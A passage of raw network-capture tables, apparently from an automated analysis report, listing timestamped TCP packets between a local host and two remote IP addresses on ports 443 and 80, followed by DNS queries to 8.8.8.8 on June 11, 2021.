                                                                                                                                                                Jun 11, 2021 05:06:42.224145889 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.224167109 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.224219084 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.224250078 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.224307060 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.224486113 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.224553108 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.224558115 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.224594116 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.224612951 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.224632025 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.224636078 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.224677086 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.224781036 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.224833012 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.224843025 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.224875927 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.224958897 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.225013018 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.225049973 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.225097895 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.225100994 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.383927107 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.383928061 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.383996964 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384023905 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.384082079 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384088039 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.384165049 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.384181023 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384269953 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384285927 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.384334087 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384371996 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.384423018 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384493113 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384531975 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384557009 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.384569883 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384634018 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384665012 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.384696960 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384732962 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.384776115 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384814024 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.384843111 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.384884119 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.384922981 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.386691093 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.386734962 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.386770964 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.386800051 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.386857986 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.387063026 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.387151957 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.387322903 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.387435913 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.387484074 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.387487888 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.387535095 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.387583971 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.387656927 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.387732983 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.387789011 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.387876987 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.387892962 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.387932062 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.387983084 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.388000965 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.388032913 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.388040066 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.388098955 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.388138056 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.388156891 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.388211012 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.388235092 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.388274908 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.388314962 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.388370037 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.388386011 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.388427019 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.388462067 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.388516903 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.388855934 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.388899088 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.388937950 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.388993979 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389008999 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389048100 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389096022 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389098883 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389153004 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389167070 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389206886 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389228106 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389288902 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389288902 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389342070 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389370918 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389416933 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389451981 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389486074 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389509916 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389527082 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389564991 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389590979 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389617920 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389672041 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389684916 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389728069 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389755011 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389766932 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389822006 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389827013 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389884949 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.389909029 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.389920950 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390000105 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390043020 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390108109 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390132904 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390145063 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390186071 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390204906 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390223980 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390296936 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390301943 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390367985 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390378952 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390408039 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390472889 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390484095 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390516996 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390547037 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390556097 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390615940 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390619040 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390671015 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390686035 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390743971 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390757084 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390816927 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.390820026 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.390853882 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414551020 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414613008 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414663076 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414684057 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414922953 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414974928 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414988041 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415044069 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415055990 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415107965 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415184021 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415240049 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415544987 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415604115 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415678024 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415735006 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415873051 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415936947 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415950060 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415992975 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416003942 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416049957 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416162014 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416212082 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416233063 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416254997 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416269064 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416292906 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416307926 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416332006 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416346073 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416380882 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.423525095 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.611542940 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:35.184505939 CEST4973180192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.184837103 CEST4973280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.229610920 CEST8049731185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:35.229652882 CEST8049732185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:35.229734898 CEST4973180192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.229762077 CEST4973280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.230685949 CEST4973280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.314006090 CEST8049732185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:35.765377045 CEST8049732185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:35.769656897 CEST4973280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.775603056 CEST4973280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.820647955 CEST8049732185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:36.961333990 CEST4973180192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.730082035 CEST4974280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.730422020 CEST4974380192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.773056984 CEST8049742185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:18.773088932 CEST8049743185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:18.773416996 CEST4974280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.773689032 CEST4974380192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.773828030 CEST4974280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.861906052 CEST8049742185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:19.317267895 CEST8049742185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:19.317461967 CEST4974280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:19.318624973 CEST4974280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:19.361713886 CEST8049742185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:20.414458036 CEST4974380192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.234323025 CEST4974780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.234350920 CEST4974680192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.279032946 CEST8049746185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:42.279068947 CEST8049747185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:42.279211044 CEST4974680192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.281949997 CEST4974780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.281996965 CEST4974680192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.367542982 CEST8049746185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:42.816906929 CEST8049746185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:42.817101002 CEST4974680192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.818253040 CEST4974680192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.860840082 CEST8049746185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:43.813780069 CEST4974780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.471008062 CEST4974880192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.471015930 CEST4974980192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.514266014 CEST8049749185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:05.514318943 CEST8049748185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:05.514436960 CEST4974980192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.514646053 CEST4974880192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.515579939 CEST4974980192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.605885029 CEST8049749185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:06.066171885 CEST8049749185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:06.067698002 CEST4974980192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:06.068443060 CEST4974980192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:06.111268044 CEST8049749185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:07.165457010 CEST4974880192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:27.552340984 CEST4975780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:27.595210075 CEST8049757185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:27.595318079 CEST4975780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:27.597299099 CEST4975780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:27.681840897 CEST8049757185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:28.119246960 CEST8049757185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:28.123477936 CEST4975780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:28.243069887 CEST4975780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:28.286056995 CEST8049757185.233.80.31192.168.2.3

UDP Packets

Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                Jun 11, 2021 05:06:55.046935081 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:55.097850084 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:03.387378931 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:03.465854883 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:18.991520882 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:19.060156107 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:20.711811066 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:20.772805929 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:33.445947886 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:33.507005930 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:34.860609055 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:35.167087078 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:38.480021000 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:38.557385921 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:55.667896986 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:55.739806890 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:56.073646069 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:56.135864973 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:02.938903093 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:02.999589920 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:03.457042933 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:03.510123968 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:04.462721109 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:04.516174078 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:05.510835886 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:05.565514088 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:07.556732893 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:07.610285997 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:11.559844017 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:11.613286018 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:17.462878942 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:17.533377886 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:18.654154062 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:18.715344906 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:31.837861061 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:31.902117014 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:33.055109024 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:33.117408037 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:40.841224909 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:40.902344942 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:41.880603075 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:42.207499027 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:04.297646046 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:04.359671116 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:05.394586086 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:05.453524113 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:22.840785027 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:22.902755976 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:23.724342108 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:23.783349037 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:24.407283068 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:24.468305111 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:25.002146959 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:25.064754963 CEST53568038.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:25.857040882 CEST5714553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:25.918283939 CEST53571458.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:26.525887966 CEST5535953192.168.2.38.8.8.8
